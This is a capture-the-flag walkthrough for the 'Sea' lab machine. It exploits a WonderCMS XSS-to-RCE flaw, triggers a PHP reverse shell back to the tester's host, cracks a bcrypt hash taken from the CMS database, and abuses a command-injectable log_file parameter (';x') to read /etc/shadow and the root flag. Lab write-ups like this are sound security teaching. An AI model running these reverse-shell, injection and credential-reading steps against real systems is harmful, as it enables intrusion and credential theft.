Sea

Recon

HTTP (80)

The website had an html form, but nothing worked. No callback was made to the server and XSS didn't have any effect in any fields.

Directory enumeration was also unsuccessful.

Wonder CMS

http://sea.htb/themes/bike/README.md

└─$ curl http://sea.htb/themes/bike/README.md
# WonderCMS bike theme

## Description
Includes animations.

## Author: turboblack

## Preview
![Theme preview](/preview.jpg)

## How to use
1. Login to your WonderCMS website.
2. Click "Settings" and click "Themes".
3. Find theme in the list and click "install".
4. In the "General" tab, select theme to activate it.

Looks like the bike theme is a CMS!

And it's open source https://github.com/WonderCMS/wondercms

└─$ curl http://sea.htb/themes/bike/version
3.2.0

XSS -> RCE

This version of CMS is vulnerable to CVE-2023-41425.

└─$ py exploit.py 'http://sea.htb/loginURL' 10.10.14.197 4444
...
---
# Adding later, same steps basically as PoC
└─$ curl "http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.197&lport=4444" 
---
└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.28:35652.
$ whoami
www-data

Note: After some sweat and blood I discovered that the exploit doesn't work and I blame box configuration, sometimes it made single request within ~10h 🥴. The exploit was already sitting in the themes directory ready to be triggered... (EVEN WHEN NEW BOX WAS SPAWNED)

Another note:

Make sure that change URLs as box doesn't have access to the internet.

www-data@sea:/var/www/sea/data$ cat database.js | grep pass -i
cat database.js | grep pass -i
        "password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
            "content": "<h1>How can I participate?<\/h1>\n<p>To participate, you only need to send your data as a participant through <a href=\"http:\/\/sea.htb\/contact.php\">contact<\/a>. Simply enter your name, email, age and country. In addition, you can optionally add your website related to your passion for night racing.<\/p>",

Crack password

Not sure why there are \ in the hash, but hashcat and john didn't like that. Remove them and start cracking the hash.

➜ cat .\hashes
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q
➜ .\hashcat.exe --show hashes
...
      # | Name                                                       | Category
  ======+============================================================+======================================
   3200 | bcrypt $2*$, Blowfish (Unix)                               | Operating System
  25600 | bcrypt(md5($pass)) / bcryptmd5                             | Forums, CMS, E-Commerce
  25800 | bcrypt(sha1($pass)) / bcryptsha1                           | Forums, CMS, E-Commerce
  28400 | bcrypt(sha512($pass)) / bcryptsha512                       | Forums, CMS, E-Commerce
...
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=./rockyou.txt --format=bcrypt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mychemicalromance (?)
1g 0:00:00:48 DONE (2024-08-11 16:54) 0.02076g/s 64.27p/s 64.27c/s 64.27C/s iamcool..carpediem
Use the "--show" option to display all of the cracked passwords reliably
Session completed

There are only 2 users:

$ ls -Alh /home
total 8.0K
drwxr-xr-x 4 amay amay 4.0K Aug  1 12:22 amay
drwxr-x--- 4 geo  geo  4.0K Aug  1 12:13 geo

SSH (22)

Creds: amay:mychemicalromance

User.txt

amay@sea:~$ cat user.txt
e4d3732c9c102d3a4975a05de384f534

Privilege Escalation

There seems to be internal applications:

amay@sea:~$ ss -tunlp4
Netid                State                 Recv-Q                Send-Q                               Local Address:Port                                  Peer Address:Port                Process
udp                  UNCONN                0                     0                                    127.0.0.53%lo:53                                         0.0.0.0:*
udp                  UNCONN                0                     0                                          0.0.0.0:68                                         0.0.0.0:*
tcp                  LISTEN                0                     4096                                     127.0.0.1:8080                                       0.0.0.0:*
tcp                  LISTEN                123                   511                                        0.0.0.0:80                                         0.0.0.0:*
tcp                  LISTEN                0                     4096                                 127.0.0.53%lo:53                                         0.0.0.0:*
tcp                  LISTEN                0                     128                                        0.0.0.0:22                                         0.0.0.0:*
tcp                  LISTEN                0                     10                                       127.0.0.1:40319                                      0.0.0.0:*
amay@sea:~$ curl 0:8080
Unauthorized accessamay@sea:~$
amay@sea:~$ curl 0:8080 -X OPTIONS -i
HTTP/1.0 401 Unauthorized
Host: 0:8080
Date: Sun, 11 Aug 2024 13:04:27 GMT
Connection: close
X-Powered-By: PHP/7.4.3-4ubuntu2.23
WWW-Authenticate: Basic realm="Restricted Area"
Content-type: text/html; charset=UTF-8

Unauthorized access
amay@sea:/var$ curl 0:8080 -H 'Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ=='


<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>System Monitor(Developing)</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f2f2f2;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            min-height: 100vh;
        }
        .container {
            width: 800px;
            background-color: #ffffff;
            border-radius: 10px;
            box-shadow: 0 0 20px rgba(0, 0, 0, 0.1);
            padding: 20px;
        }
        h1 {
            color: #333333;
            text-align: center;
            margin-top: 0;
        }
        .status {
            padding: 20px;
            border-bottom: 1px solid #cccccc;
            margin-bottom: 20px;
        }
        .status:last-child {
            border-bottom: none;
            margin-bottom: 0;
        }
        .status h2 {
            color: #666666;
            margin-top: 0;
        }
        .status p {
            color: #333333;
            margin: 10px 0;
        }
        .status.error {
            background-color: #ffe6e6;
        }
        .status.success {
            background-color: #e6ffe6;
        }
        .button {
            background-color: #4CAF50;
            color: white;
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            margin-top: 10px;
            transition: background-color 0.3s;
            display: inline-block;
        }
        .button:hover {
            background-color: #45a049;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>System Monitor(Developing)</h1>

        <div class="status">
            <h2>Disk Usage</h2>
            /dev/mapper/ubuntu--vg-ubuntu--lv  6.6G  4.2G  2.1G  68% /
            <p>Used: </p>
            <p>Total: 68%</p>
        </div>

        <div class="status">
            <h2>System Management</h2>
            <form action="" method="post">
                <button type="submit" name="clean_apt" class="button">Clean system with apt</button>
                <button type="submit" name="update_system" class="button">Update system</button>
                <button type="submit" name="clear_auth_log" class="button">Clear auth.log</button>
                <button type="submit" name="clear_access_log" class="button">Clear access.log</button>
            </form>
                    </div>

        <div class="status">
            <h2>Analyze Log File</h2>
            <form action="" method="post">
                <select name="log_file">
                    <option value="/var/log/apache2/access.log">access.log</option>
                    <option value="/var/log/auth.log">auth.log</option>
                </select>
                <button type="submit" name="analyze_log" class="button">Analyze</button>
            </form>
                    </div>

    </div>
</body>
</html>

By adding Authorization header and base64 version of auth (of amay), we are able to preview the page.

Port forward the port

└─$ ssh amay@sea.htb -L 8080:0:8080

HTTP (8080)

Analyze log files allows us to read files, and path look hardcoded.

I didn't have Burp open and was lazy to turn it back on, so I just edited HTML to read desired file like /etc/shadow

It looks like the app is literally searching for "suspicious", /etc/shadow has some suspicious characters so it doesn't show full file, but if we inject something into filename whole file becomes suspicious and shown fully:

└─$ curl 'http://localhost:8080/ui' -H 'Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ==' -d 'log_file=/etc/shadow;x&analyze_log='
...
root:$6$llVzHhr7xHrvx1wJ$gH0PLbyPaIOqLrpjpzGZbM2bZ/iHaOfv/bj1YRrktVeZ8.1KQ0Jr1Rv/TL/3Qdh84Fwec1UhX2v0LVAGsuzq.0:19775:0:99999:7:::
...
amay:$6$S1AGe5ex2k4D5MKa$gTclSeJwvND3FINpZaK0zfUqk6T9IkhlxCn17fNWLx56u.zP/f/4e5YrJRPsM3TRuuKXQDfYL44RyPzduexsm.:19775:0:99999:7:::
...
geo:$6$5mAIqOze4GJ4s9Zu$P3IgUSHlcCkKpDJ0862IgP5aqaNilEUZDGIm16FiWdxh1A5dfKjmwhMgp3xctHiHZVWGtmKY25cCrILanDPaG.:19934:0:99999:7:::
_laurel:!:19936::::::

I was not able to read /root/.ssh/id_rsa :/

Root.txt

└─$ curl 'http://localhost:8080/ui' -H 'Authorization: Basic YW1heTpteWNoZW1pY2Fscm9tYW5jZQ==' -d 'log_file=/root/root.txt;x&analyze_log=' -s | grep 'Analyze</button>' -A100
                <button type="submit" name="analyze_log" class="button">Analyze</button>
            </form>
            9cf24e872d21a687c5238a7fd92785f8
<p class='error'>Suspicious traffic patterns detected in /root/root.txt;x:</p><pre>9cf24e872d21a687c5238a7fd92785f8</pre>        </div>

    </div>
</body>
</html>

PreviousResource NextSightless

Last updated 7 months ago

hashtagRecon

hashtagHTTP (80)

hashtagWonder CMS

hashtagXSS -> RCE

hashtagCrack password

hashtagSSH (22)

hashtagUser.txt

hashtagPrivilege Escalation

hashtagRoot.txt